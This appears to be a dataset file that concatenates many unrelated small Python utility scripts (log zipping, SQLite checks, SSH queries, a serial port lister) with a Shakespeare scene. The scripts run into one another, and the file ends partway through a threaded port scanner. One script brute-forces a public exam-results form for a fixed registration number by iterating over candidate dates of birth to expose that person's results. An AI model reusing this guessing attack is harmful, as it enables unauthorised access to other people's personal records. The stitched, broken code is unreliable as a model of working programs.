3abf4e446f31266763a2fe710d62337e05dd91a8 | c21faf85627b1cfd96494aac73cc40e5f11ebb46 | /results/test_330.py | 8be1918b363f41265b49b7e3247f2554e04979da | [] | no_license | ekkya/Cyclomatic-Complexity | d02c61e009087e7d51738e60605875741532b878 | 172db2efdd974f5abad964e335552aec974b47cb | refs/heads/master | 2021-08-28T17:13:14.718314 | 2017-12-12T22:04:13 | 2017-12-12T22:04:13 | 112,042,202 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 73,382 | py | """Get the number of each character in any given text.
Inputs:
A txt file -- You will be asked for an input file. Simply input the name
of the txt file in which you have the desired text.
"""
import pprint
import collections
def main():
    """Prompt for a text file name and pretty-print how many times each
    (upper-cased) character occurs in it."""
    path = input('File Name: ')
    with open(path, 'r') as handle:
        contents = handle.read()
    frequencies = collections.Counter(contents.upper())
    print(pprint.pformat(frequencies))
if __name__ == "__main__":
main()# Script Name : pscheck.py
# Author : Craig Richards
# Created : 19th December 2011
# Last Modified : 17th June 2013
# Version : 1.1
# Modifications : 1.1 - 17/06/13 - CR - Changed to functions, and check os before running the program
# Description : Process check on Nix boxes, diplsay formatted output from ps command
import commands, os, string
def ps():
    """Prompt for a program name and pretty-print fields of its `ps -f` row.

    Python 2 only: uses raw_input, the removed `commands` module and
    string.split(). NOTE(review): the proginfo[...] indexes assume at least
    one matching process; any failure is swallowed by the bare except below
    and reported with a generic message.
    """
    program = raw_input("Enter the name of the program to check: ")
    try:
        #perform a ps command and assign results to a list
        output = commands.getoutput("ps -f|grep " + program)
        proginfo = string.split(output)
        #display results
        print "\n\
Full path:\t\t", proginfo[5], "\n\
Owner:\t\t\t", proginfo[0], "\n\
Process ID:\t\t", proginfo[1], "\n\
Parent process ID:\t", proginfo[2], "\n\
Time started:\t\t", proginfo[4]
    except:
        print "There was a problem with the program."
def main():
    """Run ps() on POSIX systems; on Windows print a short notice instead
    (Python 2 print statements)."""
    if os.name == "posix": # Unix/Linux/MacOS/BSD/etc
        ps() # Call the function
    elif os.name in ("nt", "dos", "ce"): # if the OS is windows
        print "You need to be on Linux or Unix to run this"
if __name__ == '__main__':
main()from bs4 import BeautifulSoup
import datetime
import mechanize
import urllib2
# Create a Browser
# Python 2 mechanize script: submits the exam-result form once per candidate
# date of birth between 1997-03-10 and 1998-04-01 for a fixed registration
# number, and stops at the first response whose table count differs from the
# failure page. NOTE(review): this brute-forces a third party's form.
b = mechanize.Browser()
# Disable loading robots.txt
b.set_handle_robots(False)
b.addheaders = [('User-agent',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98;)')]
# Navigate
b.open('http://cbseresults.nic.in/jee/jee_2015.htm')
# Choose a form
b.select_form(nr=0)
# Fill it out
b['regno'] = '37000304'
currentdate = datetime.date(1997,3,10)
enddate = datetime.date(1998,4,1)
while currentdate <= enddate:
    ct=0
    #print currentdate
    # Reformat YYYY/MM/DD into the DD/MM/YYYY shape the form expects.
    yyyymmdd = currentdate.strftime("%Y/%m/%d")
    ddmmyyyy = yyyymmdd[8:] + "/" + yyyymmdd[5:7] + "/" +yyyymmdd[:4]
    print(ddmmyyyy)
    b.open('http://cbseresults.nic.in/jee/jee_2015.htm')
    b.select_form(nr=0)
    b['regno'] = '37000304'
    b['dob'] = ddmmyyyy
    fd = b.submit()
    #print(fd.read())
    soup = BeautifulSoup(fd.read(),'html.parser')
    # Count result tables: 6 tables is the known "wrong DOB" page layout.
    for writ in soup.find_all('table'):
        ct = ct + 1;
        #print (ct)
    if ct == 6:
        print("---fail---")
    else:
        print("--true--")
        break;
    currentdate += datetime.timedelta(days=1)
#print fd.read()# Script Name : new_script.py
# Author : Craig Richards
# Created : 20th November 2012
# Last Modified :
# Version : 1.0
# Modifications :
# Description : This will create a new basic template for a new script
import os # Load the library module
import sys # Load the library module
import datetime # Load the library module
# Usage text shown whenever the arguments are missing or unrecognised.
text = '''You need to pass an argument for the new script you want to create, followed by the script name. You can use
-python : Python Script
-bash : Bash Script
-ksh : Korn Shell Script
-sql : SQL Script'''
# Python 2 script: pick a template config by language flag (argv[1]), then
# copy it to $scripts/Development/<name><ext>, stamping in the script name
# and today's date.
if len(sys.argv) < 3:
    print text
    sys.exit()
if '-h' in sys.argv or '--h' in sys.argv or '-help' in sys.argv or '--help' in sys.argv:
    print text
    sys.exit()
else:
    if '-python' in sys.argv[1]:
        config_file = "python.cfg"
        extension = ".py"
    elif '-bash' in sys.argv[1]:
        config_file = "bash.cfg"
        extension = ".bash"
    elif '-ksh' in sys.argv[1]:
        config_file = "ksh.cfg"
        extension = ".ksh"
    elif '-sql' in sys.argv[1]:
        config_file = "sql.cfg"
        extension = ".sql"
    else:
        print 'Unknown option - ' + text
        sys.exit()
# Template source and output locations come from environment variables.
confdir = os.getenv("my_config")
scripts = os.getenv("scripts")
dev_dir = "Development"
newfile = sys.argv[2]
output_file = (newfile + extension)
outputdir = os.path.join(scripts,dev_dir)
script = os.path.join(outputdir, output_file)
input_file = os.path.join(confdir,config_file)
old_text = " Script Name : "
new_text = (" Script Name : " + output_file)
if not(os.path.exists(outputdir)):
    os.mkdir(outputdir)
newscript = open(script, 'w')
# NOTE(review): "input" shadows the builtin, and neither handle is
# explicitly closed -- relies on interpreter exit.
input = open(input_file, 'r')
today = datetime.date.today()
old_date = " Created :"
new_date = (" Created : " + today.strftime("%d %B %Y"))
# Copy the template line by line, substituting the name and creation date.
for line in input:
    line = line.replace(old_text, new_text)
    line = line.replace(old_date, new_date)
    newscript.write(line)
# Script Name : osinfo.py
# Authors : {'geekcomputers': 'Craig Richards', 'dmahugh': 'Doug Mahugh','rutvik1010':'Rutvik Narayana Nadimpally','y12uc231': 'Satyapriya Krishna', 'minto4644':'Mohit Kumar'}
# Created : 5th April 2012
# Last Modified : July 19 2016
# Version : 1.0
# Modification 1 : Changed the profile to list again. Order is important. Everytime we run script we don't want to see different ordering.
# Modification 2 : Fixed the AttributeError checking for all properties. Using hasttr().
# Modification 3 : Removed ': ' from properties inside profile.
# Description : Displays some information about the OS you are running this script on
import platform as pl
# Names of platform-module functions to report, in a fixed order so repeated
# runs print identically.
profile = [
    'architecture',
    'linux_distribution',
    'mac_ver',
    'machine',
    'node',
    'platform',
    'processor',
    'python_build',
    'python_compiler',
    'python_version',
    'release',
    'system',
    'uname',
    'version',
]
class bcolors:
    # ANSI terminal escape codes used to style the output below.
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
# Call each available function and print its result; the hasattr guard skips
# names this platform module does not provide (avoids AttributeError).
for key in profile:
    if hasattr(pl,key):
        print(key + bcolors.BOLD + ": "+ str(getattr(pl,key)())+ bcolors.ENDC)
import csv
import glob
import os
import pdb
import pandas as pd
def main():
    """Concatenate all CSV files in each immediate subfolder of the current
    directory (except .git) into that folder's results.csv.

    Folders containing no CSV files are skipped; previously they crashed the
    run because pd.concat([]) raises ValueError.
    """
    # First os.walk tuple's dirnames == the immediate subdirectories.
    folders = next(os.walk("."))[1]
    for folder in folders:
        if folder == ".git":
            continue
        csv_paths = glob.glob(folder + "/*.csv")
        if not csv_paths:
            # Nothing to merge here; skip instead of raising in pd.concat.
            continue
        dfs = [pd.read_csv(path, index_col=None, header=0)
               for path in csv_paths]
        pd.concat(dfs).to_csv(folder + "/results.csv")
main()# Script Name : logs.py
# Author : Craig Richards
# Created : 13th October 2011
# Last Modified : 14 February 2016
# Version : 1.2
#
# Modifications : 1.1 - Added the variable zip_program so you can set it for the zip program on whichever OS, so to run on a different OS just change the locations of these two variables.
# : 1.2 - Tidy up comments and syntax
#
# Description : This script will search for all *.log files in the given directory, zip them using the program you specify and then date stamp them
import os # Load the Library Module
from time import strftime # Load just the strftime Module from Time
# Zip every .log in logsdir into a date-stamped archive via an external
# zip.exe, then delete the original log. NOTE(review): relies on zip.exe
# being on the PATH and on the hard-coded Windows directory existing.
logsdir = "c:\puttylogs" # Set the Variable logsdir
zip_program = "zip.exe" # Set the Variable zip_program - 1.1
for files in os.listdir(logsdir): # Find all the files in the directory
    if files.endswith(".log"): # Check to ensure the files in the directory end in .log
        files1 = files + "." + strftime("%Y-%m-%d") + ".zip" # Create the Variable files1, this is the files in the directory, then we add a suffix with the date and the zip extension
        os.chdir(logsdir) # Change directory to the logsdir
        os.system(zip_program + " " + files1 +" "+ files) # Zip the logs into dated zip files for each server. - 1.1
        os.remove(files) # Remove the original log files# Script Name : check_for_sqlite_files.py
# Author : Craig Richards
# Created : 07 June 2013
# Last Modified : 14 February 2016
# Version : 1.0.1
# Modifications : 1.0.1 - Remove unecessary line and variable on Line 21
# Description : Scans directories to check if there are any sqlite files in there
import os
def isSQLite3(filename):
    """Return True if *filename* looks like a SQLite 3 database file.

    A SQLite 3 database begins with the 16-byte magic string
    "SQLite format 3\\x00" and has a 100-byte header, so anything smaller
    than 100 bytes cannot be a database. Missing files return False.
    """
    from os.path import isfile, getsize
    if not isfile(filename):
        return False
    if getsize(filename) < 100:  # SQLite database file header is 100 bytes
        return False
    # BUGFIX: the original read the header and then called fd.close() on a
    # name that was never defined, raising NameError for every file that got
    # this far. A context manager closes the handle reliably.
    with open(filename, 'rb') as handle:
        header = handle.read(100)
    # BUGFIX: compare bytes against bytes; the original compared the bytes
    # header against a str literal, which is always False on Python 3.
    return header[0:16] == b'SQLite format 3\x00'
# Walk the current tree, test every file with isSQLite3() and record the
# verdicts in sqlite_audit.txt (Python 2 print statements).
# NOTE(review): isSQLite3 is called with the bare filename rather than
# os.path.join(r, files), so files outside the current directory are tested
# against the wrong path; the else-branch also writes two near-duplicate
# log lines. Confirm whether both are intentional.
log=open('sqlite_audit.txt','w')
for r,d,f in os.walk(r'.'):
    for files in f:
        if isSQLite3(files):
            print files
            print "[+] '%s' **** is a SQLITE database file **** " % os.path.join(r,files)
            log.write("[+] '%s' **** is a SQLITE database file **** " % files+'\n')
        else:
            log.write("[-] '%s' is NOT a sqlite database file" % os.path.join(r,files)+'\n')
            log.write("[-] '%s' is NOT a sqlite database file" % files+'\n')
# Script Name : create_dir_if_not_there.py
# Author : Craig Richards
# Created : 09th January 2012
# Last Modified : 22nd October 2015
# Version : 1.0.1
# Modifications : Added exceptions
# : 1.0.1 Tidy up comments and syntax
#
# Description : Checks to see if a directory exists in the users home directory, if not then create it
import os # Import the OS module
# Create ~/testdir if it does not already exist, printing the home path and
# any error encountered. Python 2 only: "except Exception, e" and the bare
# print statements are Py2 syntax.
try:
    home = os.path.expanduser("~") # Set the variable home by expanding the users set home directory
    print home # Print the location
    if not os.path.exists(home + '/testdir'):
        os.makedirs(home + '/testdir') # If not create the directory, inside their home directory
except Exception, e:
    print e# Script Name : move_files_over_x_days.py
# Author : Craig Richards
# Created : 8th December 2011
# Last Modified :
# Version : 1.0
# Modifications :
# Description : This will move all the files from the src directory that are over 240 days old to the destination directory.
import shutil
import sys
import time
import os
# Move every file in src older than 240 days into dst.
src = 'u:\\test'                             # Set the source directory
dst = 'c:\\test'                             # Set the destination directory
now = time.time()                            # Get the current time
for f in os.listdir(src):                    # Loop through all the files in the source directory
    # BUGFIX: os.listdir returns bare names, but the original passed them
    # straight to os.stat/isfile/shutil.move, which resolve relative to the
    # current working directory, not src. Join with src first.
    path = os.path.join(src, f)
    if os.stat(path).st_mtime < now - 240 * 86400:   # Older than 240 days?
        if os.path.isfile(path):             # Check it's a file
            shutil.move(path, dst)           # Move the files
# Script Name : sqlite_table_check.py
# Author : Craig Richards
# Created : 07 June 2013
# Last Modified :
# Version : 1.0
# Modifications :
# Description : Checks the main SQLITE database to ensure all the tables should exist
import sqlite3
import sys
import os
# Verify that every table named in sqlite_master_table.lst exists in the
# Dropbox-hosted jarvis.db. Paths come from the "dropbox" and "my_config"
# environment variables.
dropbox = os.getenv("dropbox")
config = os.getenv("my_config")
dbfile = ("Databases\jarvis.db")
listfile = ("sqlite_master_table.lst")
master_db = os.path.join(dropbox, dbfile)
config_file = os.path.join(config, listfile)
tablelist = open(config_file,'r');
conn = sqlite3.connect(master_db)
cursor = conn.cursor()
cursor.execute('SELECT SQLITE_VERSION()')
data = cursor.fetchone()
# NOTE(review): "(u'3.6.21',)" is the Python 2 repr of the fetched row; this
# comparison can never match under Python 3. ("Checkling" typo below is in a
# runtime string and is deliberately left untouched.)
if str(data) == "(u'3.6.21',)":
    print ("\nCurrently " + master_db + " is on SQLite version: %s" % data + " - OK -\n")
else:
    print ("\nDB On different version than master version - !!!!! \n")
conn.close()
print ("\nCheckling " + master_db + " against " + config_file + "\n")
# One connection per listed table; none of these per-table connections (or
# tablelist itself) are ever closed.
for table in tablelist.readlines():
    conn = sqlite3.connect(master_db)
    cursor = conn.cursor()
    cursor.execute("select count(*) from sqlite_master where name = ?",(table.strip(), ))
    res = cursor.fetchone()
    if (res[0]):
        print ('[+] Table : ' + table.strip() + ' exists [+]')
    else:
        print ('[-] Table : ' + table.strip() + ' does not exist [-]')
# Script Name : puttylogs.py
# Author : Craig Richards
# Created : 13th October 2011
# Last Modified : 29th February 2012
# Version : 1.2
# Modifications : 1.1 - Added the variable zip_program so you can set it for the zip program on whichever OS, so to run on a different OS just change the locations of these two variables.
# : 1.2 - 29-02-12 - CR - Added shutil module and added one line to move the zipped up logs to the zipped_logs directory
# Description : Zip up all the logs in the given directory
import os # Load the Library Module
import shutil # Load the Library Module - 1.2
from time import strftime # Load just the strftime Module from Time
# Zip each .log in logsdir into a date-stamped archive, move the archive to
# zipdir, then delete the original log. Requires zip.exe on the PATH and the
# hard-coded Windows directories to exist.
logsdir="c:\logs\puttylogs" # Set the Variable logsdir
zipdir="c:\logs\puttylogs\zipped_logs" # Set the Variable zipdir - 1.2
zip_program="zip.exe" # Set the Variable zip_program - 1.1
for files in os.listdir(logsdir): # Find all the files in the directory
    if files.endswith(".log"): # Check to ensure the files in the directory end in .log
        files1=files+"."+strftime("%Y-%m-%d")+".zip" # Create the Variable files1, this is the files in the directory, then we add a suffix with the date and the zip extension
        os.chdir(logsdir) # Change directory to the logsdir
        os.system(zip_program + " " + files1 +" "+ files) # Zip the logs into dated zip files for each server. - 1.1
        shutil.move(files1, zipdir) # Move the zipped log files to the zipped_logs directory - 1.2
        os.remove(files) # Remove the original log files
# Script Name : daily_checks.py
# Author : Craig Richards
# Created : 07th December 2011
# Last Modified : 01st May 2013
# Version : 1.5
#
# Modifications : 1.1 Removed the static lines for the putty sessions, it now reads a file, loops through and makes the connections.
# : 1.2 Added a variable filename=sys.argv[0] , as when you use __file__ it errors when creating an exe with py2exe.
# : 1.3 Changed the server_list.txt file name and moved the file to the config directory.
# : 1.4 Changed some settings due to getting a new pc
# : 1.5 Tidy comments and syntax
#
# Description : This simple script loads everything I need to carry out the daily checks for our systems.
import platform # Load Modules
import os
import subprocess
import sys
from time import strftime # Load just the strftime Module from Time
def clear_screen():                             # Function to clear the screen
    """Clear the terminal window using the platform's native command."""
    commands = {"posix": "clear",               # Unix/Linux/MacOS/BSD/etc
                "nt": "CLS", "dos": "CLS", "ce": "CLS"}   # DOS/Windows family
    command = commands.get(os.name)
    if command is not None:
        os.system(command)                      # Hand the clear command to the shell
def print_docs():                               # Function to print the daily checks automatically
    """Ask Word to open the daily-checks document, print it, then quit."""
    print ("Printing Daily Check Sheets:")
    word_exe = "C:\\Program Files (x86)\Microsoft Office\Office14\winword.exe"
    document = "P:\\\\Documentation\\Daily Docs\\Back office Daily Checks.doc"
    # /mFilePrintDefault prints the open document and /mFileExit closes Word
    proc = subprocess.Popen([word_exe, document, "/mFilePrintDefault", "/mFileExit"])
    proc.communicate()                          # Wait for Word to finish before returning
def putty_sessions(conffilename=None):          # Function to load the putty sessions I need
    """Open a PuTTY session for every server listed in the config file.

    conffilename: path of the server list.  When None (the default used by
    main()) it is rebuilt here from the my_config environment variable.
    This fixes a NameError: the original read main()'s *local* variable
    conffilename, which is not visible inside this function.
    """
    if conffilename is None:
        confdir = os.getenv("my_config")        # Same lookup main() performs - 1.3
        conffilename = os.path.join(confdir, 'daily_checks_servers.conf')
    for server in open(conffilename):           # Loop through the server list - 1.1 / 1.3
        subprocess.Popen(('putty -load '+server))   # Open the PuTTY sessions - 1.1
def rdp_sessions():
    """Launch the saved Remote Desktop session for the Euroclear box."""
    print ("Loading RDP Sessions:")
    rdp_command = "mstsc eclr.rdp"              # mstsc loads the saved .rdp profile
    subprocess.Popen(rdp_command)
def euroclear_docs():
    """Open the Euroclear password document in Internet Explorer."""
    # The two adjacent literals are concatenated into one command-line string:
    # the IE executable followed by the document's file:// URL.
    launch_string = ('"C:\\Program Files\\Internet Explorer\\iexplore.exe"'
                     '"file://fs1\pub_b\Pub_Admin\Documentation\Settlements_Files\PWD\Eclr.doc"')
    subprocess.Popen(launch_string)
# End of the functions
# Start of the Main Program
def main():
    """Run every daily-checks task in sequence."""
    script_name = sys.argv[0]                   # Script name (avoids __file__, which breaks py2exe) - 1.2
    # NOTE(review): this path is built but never used here - putty_sessions()
    # is expected to locate the config itself; kept for parity with 1.3.
    conffilename = os.path.join(os.getenv("my_config"), 'daily_checks_servers.conf')
    clear_screen()                              # Start with a clean terminal
    # Welcome banner: who, which script, when, where it ran and from where.
    greeting = "Good Morning " + os.getenv('USERNAME') + ", " + script_name
    print (greeting, "ran at", strftime("%Y-%m-%d %H:%M:%S"),
           "on", platform.node(), "run from", os.getcwd())
    print_docs()                                # Print the daily check sheets
    putty_sessions()                            # Open the PuTTY sessions
    rdp_sessions()                              # Open the RDP session
    euroclear_docs()                            # Open the Euroclear document
if __name__ == "__main__":
    main()
import serial
import sys
#A serial port-scanner for linux and windows platforms
#Author: Julio César Echeverri Marulanda
#e-mail: julio.em7@gmail.com
#blog: blogdelingeniero1.wordpress.com
#You should have installed the PySerial module to use this method.
#You can install pyserial with the following line: pip install pyserial
def ListAvailablePorts():
    """Return a list of virtual serial port names available on this machine.

    Supports Windows and Linux only; returns an empty list when no ports are
    found (or when the platform is unsupported).
    """
    AvailablePorts = []
    platform = sys.platform
    if platform == 'win32':
        # On Windows, probe COM ports 0-254 by trying to open each one.
        for i in range(255):
            try:
                ser = serial.Serial(i,9600)
            except serial.serialutil.SerialException:
                pass                            # Port doesn't exist / is busy: skip it
            else:
                AvailablePorts.append(ser.portstr)
                ser.close()
        # Fix: Python 2 reports 'linux2', so test the prefix instead of
        # comparing against the exact string 'linux'.
    elif platform.startswith('linux'):
        for i in range(0,255):
            try:
                ser = serial.Serial('/dev/ttyUSB'+str(i))
            except serial.serialutil.SerialException:
                pass                            # Device node absent: skip it
            else:
                AvailablePorts.append('/dev/ttyUSB'+str(i))
                ser.close()
    else:
        # print() as a function so the module parses on both Python 2 and 3.
        print('''This method was developed only for linux and windows
    the current platform isn't recognised''')
    return AvailablePorts
# EXAMPLE OF HOW IT WORKS
# if an Arduino is connected to the computer, the port will be show in the terminal
# print ListAvailablePorts()# Script Name : nslookup_check.py
# Author : Craig Richards
# Created : 5th January 2012
# Last Modified :
# Version : 1.0
# Modifications :
# Description : This very simple script opens the file server_list.txt and then does an nslookup for each one to check the DNS entry
import subprocess # Import the subprocess module
for server in open('server_list.txt'):          # Open the file and read each line
    # Pass the command as an argument list and strip the trailing newline so
    # the lookup target is clean; a single command string is only handled
    # this way on Windows, so the list form also works on POSIX.
    subprocess.Popen(['nslookup', server.strip()])   # Run the nslookup command for each server in the list
info = '''SCENE I. Yorkshire. Gaultree Forest.
Enter the ARCHBISHOP OF YORK, MOWBRAY, LORD HASTINGS, and others
ARCHBISHOP OF YORK
What is this forest call'd?
HASTINGS
'Tis Gaultree Forest, an't shall please your grace.
ARCHBISHOP OF YORK
Here stand, my lords; and send discoverers forth
To know the numbers of our enemies.
HASTINGS
We have sent forth already.
ARCHBISHOP OF YORK
'Tis well done.
My friends and brethren in these great affairs,
I must acquaint you that I have received
New-dated letters from Northumberland;
Their cold intent, tenor and substance, thus:
Here doth he wish his person, with such powers
As might hold sortance with his quality,
The which he could not levy; whereupon
He is retired, to ripe his growing fortunes,
To Scotland: and concludes in hearty prayers
That your attempts may overlive the hazard
And fearful melting of their opposite.
MOWBRAY
Thus do the hopes we have in him touch ground
And dash themselves to pieces.
Enter a Messenger
HASTINGS
Now, what news?
Messenger
West of this forest, scarcely off a mile,
In goodly form comes on the enemy;
And, by the ground they hide, I judge their number
Upon or near the rate of thirty thousand.
MOWBRAY
The just proportion that we gave them out
Let us sway on and face them in the field.
ARCHBISHOP OF YORK
What well-appointed leader fronts us here?
Enter WESTMORELAND
MOWBRAY
I think it is my Lord of Westmoreland.
WESTMORELAND
Health and fair greeting from our general,
The prince, Lord John and Duke of Lancaster.
ARCHBISHOP OF YORK
Say on, my Lord of Westmoreland, in peace:
What doth concern your coming?
WESTMORELAND
Then, my lord,
Unto your grace do I in chief address
The substance of my speech. If that rebellion
Came like itself, in base and abject routs,
Led on by bloody youth, guarded with rags,
And countenanced by boys and beggary,
I say, if damn'd commotion so appear'd,
In his true, native and most proper shape,
You, reverend father, and these noble lords
Had not been here, to dress the ugly form
Of base and bloody insurrection
With your fair honours. You, lord archbishop,
Whose see is by a civil peace maintained,
Whose beard the silver hand of peace hath touch'd,
Whose learning and good letters peace hath tutor'd,
Whose white investments figure innocence,
The dove and very blessed spirit of peace,
Wherefore do you so ill translate ourself
Out of the speech of peace that bears such grace,
Into the harsh and boisterous tongue of war;
Turning your books to graves, your ink to blood,
Your pens to lances and your tongue divine
To a trumpet and a point of war?
ARCHBISHOP OF YORK
Wherefore do I this? so the question stands.
Briefly to this end: we are all diseased,
And with our surfeiting and wanton hours
Have brought ourselves into a burning fever,
And we must bleed for it; of which disease
Our late king, Richard, being infected, died.
But, my most noble Lord of Westmoreland,
I take not on me here as a physician,
Nor do I as an enemy to peace
Troop in the throngs of military men;
But rather show awhile like fearful war,
To diet rank minds sick of happiness
And purge the obstructions which begin to stop
Our very veins of life. Hear me more plainly.
I have in equal balance justly weigh'd
What wrongs our arms may do, what wrongs we suffer,
And find our griefs heavier than our offences.
We see which way the stream of time doth run,
And are enforced from our most quiet there
By the rough torrent of occasion;
And have the summary of all our griefs,
When time shall serve, to show in articles;
Which long ere this we offer'd to the king,
And might by no suit gain our audience:
When we are wrong'd and would unfold our griefs,
We are denied access unto his person
Even by those men that most have done us wrong.
The dangers of the days but newly gone,
Whose memory is written on the earth
With yet appearing blood, and the examples
Of every minute's instance, present now,
Hath put us in these ill-beseeming arms,
Not to break peace or any branch of it,
But to establish here a peace indeed,
Concurring both in name and quality.
WESTMORELAND
When ever yet was your appeal denied?
Wherein have you been galled by the king?
What peer hath been suborn'd to grate on you,
That you should seal this lawless bloody book
Of forged rebellion with a seal divine
And consecrate commotion's bitter edge?
ARCHBISHOP OF YORK
My brother general, the commonwealth,
To brother born an household cruelty,
I make my quarrel in particular.
WESTMORELAND
There is no need of any such redress;
Or if there were, it not belongs to you.
MOWBRAY
Why not to him in part, and to us all
That feel the bruises of the days before,
And suffer the condition of these times
To lay a heavy and unequal hand
Upon our honours?
WESTMORELAND
O, my good Lord Mowbray,
Construe the times to their necessities,
And you shall say indeed, it is the time,
And not the king, that doth you injuries.
Yet for your part, it not appears to me
Either from the king or in the present time
That you should have an inch of any ground
To build a grief on: were you not restored
To all the Duke of Norfolk's signories,
Your noble and right well remember'd father's?
MOWBRAY
What thing, in honour, had my father lost,
That need to be revived and breathed in me?
The king that loved him, as the state stood then,
Was force perforce compell'd to banish him:
And then that Harry Bolingbroke and he,
Being mounted and both roused in their seats,
Their neighing coursers daring of the spur,
Their armed staves in charge, their beavers down,
Their eyes of fire sparking through sights of steel
And the loud trumpet blowing them together,
Then, then, when there was nothing could have stay'd
My father from the breast of Bolingbroke,
O when the king did throw his warder down,
His own life hung upon the staff he threw;
Then threw he down himself and all their lives
That by indictment and by dint of sword
Have since miscarried under Bolingbroke.
WESTMORELAND
You speak, Lord Mowbray, now you know not what.
The Earl of Hereford was reputed then
In England the most valiant gentlemen:
Who knows on whom fortune would then have smiled?
But if your father had been victor there,
He ne'er had borne it out of Coventry:
For all the country in a general voice
Cried hate upon him; and all their prayers and love
Were set on Hereford, whom they doted on
And bless'd and graced indeed, more than the king.
But this is mere digression from my purpose.
Here come I from our princely general
To know your griefs; to tell you from his grace
That he will give you audience; and wherein
It shall appear that your demands are just,
You shall enjoy them, every thing set off
That might so much as think you enemies.
MOWBRAY
But he hath forced us to compel this offer;
And it proceeds from policy, not love.
WESTMORELAND
Mowbray, you overween to take it so;
This offer comes from mercy, not from fear:
For, lo! within a ken our army lies,
Upon mine honour, all too confident
To give admittance to a thought of fear.
Our battle is more full of names than yours,
Our men more perfect in the use of arms,
Our armour all as strong, our cause the best;
Then reason will our heart should be as good
Say you not then our offer is compell'd.
MOWBRAY
Well, by my will we shall admit no parley.
WESTMORELAND
That argues but the shame of your offence:
A rotten case abides no handling.
HASTINGS
Hath the Prince John a full commission,
In very ample virtue of his father,
To hear and absolutely to determine
Of what conditions we shall stand upon?
WESTMORELAND
That is intended in the general's name:
I muse you make so slight a question.
ARCHBISHOP OF YORK
Then take, my Lord of Westmoreland, this schedule,
For this contains our general grievances:
Each several article herein redress'd,
All members of our cause, both here and hence,
That are insinew'd to this action,
Acquitted by a true substantial form
And present execution of our wills
To us and to our purposes confined,
We come within our awful banks again
And knit our powers to the arm of peace.
WESTMORELAND
This will I show the general. Please you, lords,
In sight of both our battles we may meet;
And either end in peace, which God so frame!
Or to the place of difference call the swords
Which must decide it.
ARCHBISHOP OF YORK
My lord, we will do so.
Exit WESTMORELAND
MOWBRAY
There is a thing within my bosom tells me
That no conditions of our peace can stand.
HASTINGS
Fear you not that: if we can make our peace
Upon such large terms and so absolute
As our conditions shall consist upon,
Our peace shall stand as firm as rocky mountains.
MOWBRAY
Yea, but our valuation shall be such
That every slight and false-derived cause,
Yea, every idle, nice and wanton reason
Shall to the king taste of this action;
That, were our royal faiths martyrs in love,
We shall be winnow'd with so rough a wind
That even our corn shall seem as light as chaff
And good from bad find no partition.
ARCHBISHOP OF YORK
No, no, my lord. Note this; the king is weary
Of dainty and such picking grievances:
For he hath found to end one doubt by death
Revives two greater in the heirs of life,
And therefore will he wipe his tables clean
And keep no tell-tale to his memory
That may repeat and history his loss
To new remembrance; for full well he knows
He cannot so precisely weed this land
As his misdoubts present occasion:
His foes are so enrooted with his friends
That, plucking to unfix an enemy,
He doth unfasten so and shake a friend:
So that this land, like an offensive wife
That hath enraged him on to offer strokes,
As he is striking, holds his infant up
And hangs resolved correction in the arm
That was uprear'd to execution.
HASTINGS
Besides, the king hath wasted all his rods
On late offenders, that he now doth lack
The very instruments of chastisement:
So that his power, like to a fangless lion,
May offer, but not hold.
ARCHBISHOP OF YORK
'Tis very true:
And therefore be assured, my good lord marshal,
If we do now make our atonement well,
Our peace will, like a broken limb united,
Grow stronger for the breaking.
MOWBRAY
Be it so.
Here is return'd my Lord of Westmoreland.
Re-enter WESTMORELAND
WESTMORELAND
The prince is here at hand: pleaseth your lordship
To meet his grace just distance 'tween our armies.
MOWBRAY
Your grace of York, in God's name then, set forward.
ARCHBISHOP OF YORK
Before, and greet his grace: my lord, we come.
Exeunt'''
import pprint                                   # Restore the import that was lost when the scripts were concatenated

# Count how many times each character (upper-cased) appears in the text above.
count = {}
for character in info.upper():
    count[character] = count.get(character, 0) + 1   # default 0 for first sighting
value = pprint.pformat(count)                   # pformat sorts the keys for readable output
print(value)
# Script Name : get_info_remoute_srv.py
# Author : Pavel Sirotkin
# Created : 3th April 2016
# Last Modified : -
# Version : 1.0.0
# Modifications :
# Description : this will get info about a remote server on Linux through an SSH connection. Connections to these servers must use keys
import subprocess
HOSTS = ('proxy1', 'proxy')
COMMANDS = ('uname -a', 'uptime')
for host in HOSTS:                              # Query each remote machine in turn
    captured = []                               # stdout lines, one entry per command
    proc = None                                 # Holds the most recent ssh process
    for command in COMMANDS:
        proc = subprocess.Popen(["ssh", "%s" % host, command],
                                shell=False,
                                stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE)
        captured.append(proc.stdout.readlines())   # Read this command's output
    print('--------------- ' + host + ' --------------- ')
    for lines in captured:
        if lines:                               # Command produced output: show it
            print(lines)
        else:                                   # Empty output: show stderr of the last ssh and stop
            print(proc.stderr.readlines())
            break
# Script Name : portscanner.py
# Author : Craig Richards
# Created : 20 May 2013
# Last Modified :
# Version : 1.0
# Modifications :
# Description : Port Scanner, you just pass the host and the ports
import optparse # Import the module
from socket import * # Import the module
from threading import * # Import the module
screenLock = Semaphore(value=1) # Prevent other threads from preceeding
def connScan(tgtHost, tgtPort):                 # Start of the function
    """Try a TCP connect to tgtHost:tgtPort and report open/closed.

    screenLock serialises the printing so thread output doesn't interleave.
    """
    try:
        connSkt = socket(AF_INET, SOCK_STREAM)  # Open a socket
        connSkt.connect((tgtHost, tgtPort))
        connSkt.send(b'')                       # b'' so this works on Python 3 sockets too
        results = connSkt.recv(100)             # Grab any banner the service sends
        screenLock.acquire()                    # Acquire the lock
        print('[+] %d/tcp open' % tgtPort)      # print() for Python 2/3 compatibility
        print('[+] ' + str(results))
    except Exception:                           # Narrowed from a bare except: connect/recv failure means closed
        screenLock.acquire()
        print('[-] %d/tcp closed ' % tgtPort)
    finally:
        screenLock.release()                    # Always release the print lock
        connSkt.close()
def portScan(tgtHost, tgtPorts):                # Start of the function
    """Resolve tgtHost then launch one connScan thread per port in tgtPorts."""
    try:
        tgtIP = gethostbyname(tgtHost)          # Get the IP from the hostname
    except Exception:                           # Narrowed from a bare except: DNS resolution failed
        print("[-] Cannot resolve '%s': Unknown host" % tgtHost)   # print() for Python 2/3 compatibility
        return
    try:
